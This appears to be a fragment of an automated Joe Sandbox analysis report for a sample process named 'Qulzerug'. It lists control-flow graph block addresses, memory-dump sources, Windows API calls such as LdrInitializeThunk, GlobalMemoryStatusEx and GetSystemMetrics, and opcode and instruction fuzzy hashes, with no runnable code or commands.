68ddde5-68dddeb 1967->1979 1980 68dddb2-68ddddf 1967->1980 1973->1922 1974->1973 1997 68ddc2e-68ddc9b 1974->1997 1979->1851 1981 68dddf1-68dddf8 1979->1981 1980->1922 1980->1979 1982 68dde09-68dde2d 1981->1982 1983 68dddfa-68dde00 1981->1983 1996 68ddea5-68ddf02 1982->1996 1983->1851 1986 68dde06 1983->1986 1986->1982 2010 68ddf68-68ddfcf 1996->2010 2011 68ddf04-68ddf62 1996->2011 1997->1851 2018 68ddca1 1997->2018 2010->1910 2011->2010 2027 68dde2f-68dde9c 2011->2027 2018->1957 2027->1851 2037 68ddea2 2027->2037 2037->1996
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2523927826.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_68d0000_Qulzerug.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6ca53554deb5e117ec3fbfc31e8d1698e143737fc9145e4e2c4854dd71464601
                        • Instruction ID: 458f6378ebbc241553bf82133c6e322c55ebdc37aac005e1158f7ad9090f41fb
                        • Opcode Fuzzy Hash: 6ca53554deb5e117ec3fbfc31e8d1698e143737fc9145e4e2c4854dd71464601
                        • Instruction Fuzzy Hash: 20622970A402189FDB94EF79C854BAE7BF2BF88300F2084A9E419EB395DA719D41CF51

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2038 696dcb0-696dd05 LdrInitializeThunk 2039 696dda3-696ddae 2038->2039 2040 696dd0b-696dd1e 2038->2040 2043 696ddb0-696ddbc 2039->2043 2044 696ddc1-696ddd4 2039->2044 2041 696dd24-696dd73 2040->2041 2042 696e28d-696e2be 2040->2042 2068 696dd84-696dd91 2041->2068 2069 696dd75-696dd82 2041->2069 2045 696e2e9-696e2f0 2042->2045 2043->2045 2044->2042 2046 696ddda-696ddf0 2044->2046 2050 696e2f7-696e305 2045->2050 2051 696e2f2 2045->2051 2046->2042 2049 696ddf6-696de33 2046->2049 2063 696e288 2049->2063 2064 696de39-696de61 2049->2064 2051->2050 2063->2042 2064->2042 2072 696de67-696de90 2064->2072 2068->2063 2071 696dd97-696dd9d 2068->2071 2069->2039 2071->2039 2071->2040 2072->2063 2074 696de96-696dea2 2072->2074 2075 696e203-696e216 2074->2075 2076 696dea8-696deb8 2074->2076 2075->2042 2077 696e218-696e22b 2075->2077 2076->2042 2078 696debe-696deeb 2076->2078 2077->2063 2079 696e22d-696e241 2077->2079 2078->2042 2086 696def1-696df93 call 696e3a8 2078->2086 2079->2063 2082 696e243-696e248 call 102dd60 2079->2082 2084 696e24e-696e251 2082->2084 2084->2045 2099 696e0a1-696e0b1 2086->2099 2100 696df99-696dfa9 2086->2100 2099->2042 2101 696e0b7-696e148 call 6966600 2099->2101 2100->2042 2102 696dfaf-696e02b 2100->2102 2101->2075 2127 696e14e-696e164 2101->2127 2102->2042 2121 696e031-696e039 2102->2121 2121->2042 2123 696e03f-696e06b 2121->2123 2128 696e090-696e099 2123->2128 2129 696e06d-696e071 2123->2129 2130 696e166-696e16c 2127->2130 2131 696e17c-696e184 2127->2131 2128->2099 2129->2042 2132 696e077-696e08e 2129->2132 2134 696e170-696e17a 2130->2134 2135 696e16e 2130->2135 2131->2063 2133 696e18a 2131->2133 2132->2128 2138 696e194-696e1ca call 6969258 2133->2138 2134->2131 2135->2131 2138->2042 2144 696e1d0-696e1f1 2138->2144 2144->2063 2147 696e1f7-696e1fd 2144->2147 2147->2075 2147->2076
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2524689476.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_6960000_Qulzerug.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 721a247ebe9b2450a5511d4018b74fc684be751c27dded8d41058dfd717e4aed
                        • Instruction ID: 5a41d195349166b9433c04d29831e830768a5e44e4cb90079f578c0d34871bc2
                        • Opcode Fuzzy Hash: 721a247ebe9b2450a5511d4018b74fc684be751c27dded8d41058dfd717e4aed
                        • Instruction Fuzzy Hash: 7F025F74E002098FDB54DFA9C884B9EBBF6BF88300F258559E415AB795DB74EC46CB80

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2318 102a7f0-102a7fb 2319 102a825-102a844 call 1029dbc 2318->2319 2320 102a7fd-102a824 call 1029db0 2318->2320 2326 102a846-102a849 2319->2326 2327 102a84a-102a88d 2319->2327 2332 102a8a7-102a8a9 2327->2332 2333 102a88f-102a8a4 2327->2333 2334 102a8ab-102a8ae 2332->2334 2335 102a8af-102a93c GlobalMemoryStatusEx 2332->2335 2333->2332 2341 102a945-102a96d 2335->2341 2342 102a93e-102a944 2335->2342 2342->2341
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2498823227.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_1020000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b5d9b73cdc8cb1a8ff6d6d7aa2ca07ba4fa5c2908c515fe5583fcb1622c497e6
                        • Instruction ID: dd88a92e3ee71eae0965fc7cd78639d749ece4df3397efac2b7e4b12300ae17e
                        • Opcode Fuzzy Hash: b5d9b73cdc8cb1a8ff6d6d7aa2ca07ba4fa5c2908c515fe5583fcb1622c497e6
                        • Instruction Fuzzy Hash: 36412372E043598FDB14DFB9D4103EEBBF5AF89210F15856AD884A7241EB789842CBA1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2345 696dca0-696dca2 2346 696dca4-696dca6 2345->2346 2347 696dcaa-696dcac 2345->2347 2348 696dcae 2346->2348 2349 696dca8 2346->2349 2347->2348 2351 696dcb0-696dd05 LdrInitializeThunk 2348->2351 2349->2347 2352 696dda3-696ddae 2351->2352 2353 696dd0b-696dd1e 2351->2353 2356 696ddb0-696ddbc 2352->2356 2357 696ddc1-696ddd4 2352->2357 2354 696dd24-696dd73 2353->2354 2355 696e28d-696e2be 2353->2355 2381 696dd84-696dd91 2354->2381 2382 696dd75-696dd82 2354->2382 2358 696e2e9-696e2f0 2355->2358 2356->2358 2357->2355 2359 696ddda-696ddf0 2357->2359 2363 696e2f7-696e305 2358->2363 2364 696e2f2 2358->2364 2359->2355 2362 696ddf6-696de33 2359->2362 2376 696e288 2362->2376 2377 696de39-696de61 2362->2377 2364->2363 2376->2355 2377->2355 2385 696de67-696de90 2377->2385 2381->2376 2384 696dd97-696dd9d 2381->2384 2382->2352 2384->2352 2384->2353 2385->2376 2387 696de96-696dea2 2385->2387 2388 696e203-696e216 2387->2388 2389 696dea8-696deb8 2387->2389 2388->2355 2390 696e218-696e22b 2388->2390 2389->2355 2391 696debe-696deeb 2389->2391 2390->2376 2392 696e22d-696e241 2390->2392 2391->2355 2399 696def1-696df49 2391->2399 2392->2376 2395 696e243-696e248 call 102dd60 2392->2395 2397 696e24e-696e251 2395->2397 2397->2358 2407 696df50-696df5c call 696e3a8 2399->2407 2408 696df62-696df93 2407->2408 2412 696e0a1-696e0b1 2408->2412 2413 696df99-696dfa9 2408->2413 2412->2355 2414 696e0b7-696e148 call 6966600 2412->2414 2413->2355 2415 696dfaf-696e02b 2413->2415 2414->2388 2440 696e14e-696e164 2414->2440 2415->2355 2434 696e031-696e039 2415->2434 2434->2355 2436 696e03f-696e06b 2434->2436 2441 696e090-696e099 2436->2441 2442 696e06d-696e071 2436->2442 2443 696e166-696e16c 2440->2443 2444 696e17c-696e184 2440->2444 2441->2412 2442->2355 2445 696e077-696e08e 2442->2445 2447 696e170-696e17a 2443->2447 2448 696e16e 2443->2448 2444->2376 2446 696e18a 2444->2446 2445->2441 2451 696e194-696e1ca call 6969258 2446->2451 2447->2444 2448->2444 2451->2355 2457 696e1d0-696e1f1 2451->2457 2457->2376 2460 696e1f7-696e1fd 2457->2460 2460->2388 2460->2389
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2524689476.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_6960000_Qulzerug.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 225e4ff2a432d7366e0eaf87763c8dc6234850ee89fb730844602a4376820f81
                        • Instruction ID: 7f87455512387e7afe4b85b745a92eaee6093918e04eb0d1c120be3c105ee047
                        • Opcode Fuzzy Hash: 225e4ff2a432d7366e0eaf87763c8dc6234850ee89fb730844602a4376820f81
                        • Instruction Fuzzy Hash: 1431AF70E013188FDF24DFA9C4046DDBBB2BF88314F20856AD464AB781D775AC4ACB90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2463 68d0040-68d007e LdrInitializeThunk 2465 68d0091-68d00a4 2463->2465 2466 68d0080-68d008c 2463->2466 2468 68d00aa-68d00ba 2465->2468 2469 68d0132-68d0163 2465->2469 2467 68d018e-68d0195 2466->2467 2470 68d019f-68d01a6 2467->2470 2471 68d0197-68d019c 2467->2471 2472 68d00cd-68d00e3 2468->2472 2473 68d00bc-68d00c8 2468->2473 2469->2467 2471->2470 2472->2469 2475 68d00e5-68d00f2 2472->2475 2473->2467 2475->2469 2477 68d00f4-68d00fb 2475->2477 2477->2467
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2523927826.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_68d0000_Qulzerug.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: f941f4de24428ae6d9c81f69c1a35c9a127aaa8c68e4699ff5476be1649e83b1
                        • Instruction ID: a05eef472b53b49a39d38d829993ab12462aa5be4fb574a09351584ebed4f10e
                        • Opcode Fuzzy Hash: f941f4de24428ae6d9c81f69c1a35c9a127aaa8c68e4699ff5476be1649e83b1
                        • Instruction Fuzzy Hash: A0313674A01209AFDB08CF95E5C0ADDFBB2FF84314F65C659E404AB285C775A985CBA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2479 68d0006-68d0032 2480 68d003a 2479->2480 2481 68d0034-68d0038 2479->2481 2483 68d003c-68d0041 2480->2483 2484 68d0042-68d007e LdrInitializeThunk 2480->2484 2481->2480 2482 68d0092-68d00ba 2481->2482 2488 68d00cd-68d00e3 2482->2488 2489 68d00bc-68d00c8 2482->2489 2483->2484 2486 68d0091-68d00a4 2484->2486 2487 68d0080-68d008c 2484->2487 2491 68d00aa-68d00ba 2486->2491 2492 68d0132-68d0163 2486->2492 2490 68d018e-68d0195 2487->2490 2488->2492 2493 68d00e5-68d00f2 2488->2493 2489->2490 2494 68d019f-68d01a6 2490->2494 2495 68d0197-68d019c 2490->2495 2491->2488 2491->2489 2492->2490 2493->2492 2496 68d00f4-68d00fb 2493->2496 2495->2494 2496->2490
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2523927826.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_68d0000_Qulzerug.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 614dc8ba3d29cdd1e3111ab0dff964747e6b42efd0378ff3d33fed959a0012e0
                        • Instruction ID: 754dd10eedba2c4f596cc4d1bb2847cdcdc79608ea663345e8726eb05883bc47
                        • Opcode Fuzzy Hash: 614dc8ba3d29cdd1e3111ab0dff964747e6b42efd0378ff3d33fed959a0012e0
                        • Instruction Fuzzy Hash: D731D730D05388AFDB16CFA4D884ACDBFB1FF46354F15829AD0809B252D7745C8ACBA1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2500 102a8c0-102a906 2502 102a90e-102a93c GlobalMemoryStatusEx 2500->2502 2503 102a945-102a96d 2502->2503 2504 102a93e-102a944 2502->2504 2504->2503
                        APIs
                        • GlobalMemoryStatusEx.KERNELBASE(00000019), ref: 0102A92F
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2498823227.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_1020000_Qulzerug.jbxd
                        Similarity
                        • API ID: GlobalMemoryStatus
                        • String ID:
                        • API String ID: 1890195054-0
                        • Opcode ID: 4a1bfe3d7a21a505fd427e051e1714b335922af2d6e7415c23e4a7e988105a21
                        • Instruction ID: 8a594ce48642b42091399a5f4a13ecd5f7531b15777e54cb5678b6ac57477b7e
                        • Opcode Fuzzy Hash: 4a1bfe3d7a21a505fd427e051e1714b335922af2d6e7415c23e4a7e988105a21
                        • Instruction Fuzzy Hash: DB1144B5D002599FDB20CF9AC444BDEFBF4AF08320F15816AD858A7240D778A944CFA5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2507 102a5d8-102a665 GetSystemMetrics 2511 102a667-102a66d 2507->2511 2512 102a66e-102a682 2507->2512 2511->2512
                        APIs
                        • GetSystemMetrics.USER32(00000043), ref: 0102A654
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2498823227.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_1020000_Qulzerug.jbxd
                        Similarity
                        • API ID: MetricsSystem
                        • String ID:
                        • API String ID: 4116985748-0
                        • Opcode ID: a234815b89478c4942497b5cefcfb5ff6f7bf64c76dbc7188fafffb1cedbc3ef
                        • Instruction ID: c5adb578170cf684f5b87781be5b65aacbacc15339e6961bc518db32ee13b509
                        • Opcode Fuzzy Hash: a234815b89478c4942497b5cefcfb5ff6f7bf64c76dbc7188fafffb1cedbc3ef
                        • Instruction Fuzzy Hash: 581167B5D003488FDB249FA9D0487EEBFF0EB49324F24846EC55AA7240D7796684CFA5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2514 102a8c8-102a906 2515 102a90e-102a93c GlobalMemoryStatusEx 2514->2515 2516 102a945-102a96d 2515->2516 2517 102a93e-102a944 2515->2517 2517->2516
                        APIs
                        • GlobalMemoryStatusEx.KERNELBASE(00000019), ref: 0102A92F
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2498823227.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_1020000_Qulzerug.jbxd
                        Similarity
                        • API ID: GlobalMemoryStatus
                        • String ID:
                        • API String ID: 1890195054-0
                        • Opcode ID: ffdd64366a254c80ccdb975bf724ec2381bd64ef5744d13f66fce5444a3e9336
                        • Instruction ID: ebd6f0c84b9558715dc949fd84bfd904fa558cd134afb6cf2ebcd72052b3920e
                        • Opcode Fuzzy Hash: ffdd64366a254c80ccdb975bf724ec2381bd64ef5744d13f66fce5444a3e9336
                        • Instruction Fuzzy Hash: 831123B5D002699FDB10CF9AC444BDEFBF4AF48320F15816AD818A7240D778A945CFA5
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2498150005.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_fdd000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ddca6ddc1607f3b0792a2d24052f6ac9c7c0ff06e19c72626b93ae221a83e8a5
                        • Instruction ID: 2a74efbe43aa6d1e5483037d67749f21c098950e43a7b1e6070c1d74b1a093ea
                        • Opcode Fuzzy Hash: ddca6ddc1607f3b0792a2d24052f6ac9c7c0ff06e19c72626b93ae221a83e8a5
                        • Instruction Fuzzy Hash: 6A21F576504344DFDB14DF14D988B16BB66EBC4324F28C56ED80A4B34AC337D847DA62
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2498150005.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_fdd000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0202e48a49a462e0c13ad1f6dcfd961b942a0356f01c0694a684124a933538b8
                        • Instruction ID: 5d189d57ff30d310a6e68362f690fc4b3dbc985b5c12e804026d7e7d3ac37643
                        • Opcode Fuzzy Hash: 0202e48a49a462e0c13ad1f6dcfd961b942a0356f01c0694a684124a933538b8
                        • Instruction Fuzzy Hash: B22153755093808FD712CF24D594715BF71EB46314F29C5EBD8498F6A7C33A980ACB62